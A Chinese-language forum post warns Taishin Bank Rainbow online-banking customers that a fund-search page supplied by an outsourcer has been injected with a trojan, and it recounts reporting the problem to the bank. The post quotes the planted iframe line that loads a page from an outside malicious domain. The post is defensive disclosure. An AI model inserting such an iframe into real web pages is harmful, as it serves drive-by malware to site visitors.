在查詢基金資訊時,防毒軟體突然跳出木馬警訊,
如果有台新Rainbow理財帳戶的朋友,不妨注意一下!
以下是在查詢基金資訊的頁面
請大家注意「基金搜尋」的功能區塊,
這邊會另外開啟一視窗,
這就是部分出問題的!
因為這部分是由[gogofund.com]提供的後端服務,
在查詢結果的頁面被植入木馬程式,
來源指向中國大陸的網站,
在頁面原始碼的最後會出現 iframe src="http://timeout.mmy88.cn/2007.htm 的程式碼
就是問題所在
mmy88.cn是2006年下半年才註冊的網址,
推測這個木馬被植入的時間應該是之後的事情!
查詢畫面原始檔如附件,有興趣的朋友可以下載看看
附加壓縮檔: 200702/mobile01-65f8dbb135e60abfb73c917952e1fec1.zip
很弔詭的事,從台新銀行的網站可以發現,他們基金資訊後端都是由gogofund提供的,
可是只有在Rainbow網銀的部分出現被植入木馬,
其他部分是OK的,直接從gogofund網站查詢也是正常的~
看來是這個外包商出問題的結果!
後記:小弟第一時間跟台新的客服聯繫,剛開始他們還不太相信,
還以為是小弟自己的電腦中毒,直到小弟表明自己從事相關工作,
也教他step by step,看到show出來的網頁是gogofund提供的,
總算願意把我的意見pass給資訊單位
問題是,現在資訊單位都放假了,要週一才能處理
天知道有多少客戶在這段時間會受害啊~
小弟雞婆在此跟大家分享,希望可以救多少人算多少人囉~
祝福大家
後記2:剛剛接到台新客服主管的電話,對方表示將立即處理,希望有好結果
這不禁讓我想到,之前工作上被KPMG資通安全稽核時,外包廠商那一塊也是一
個重點,沒想到就發生活生生的例子了~
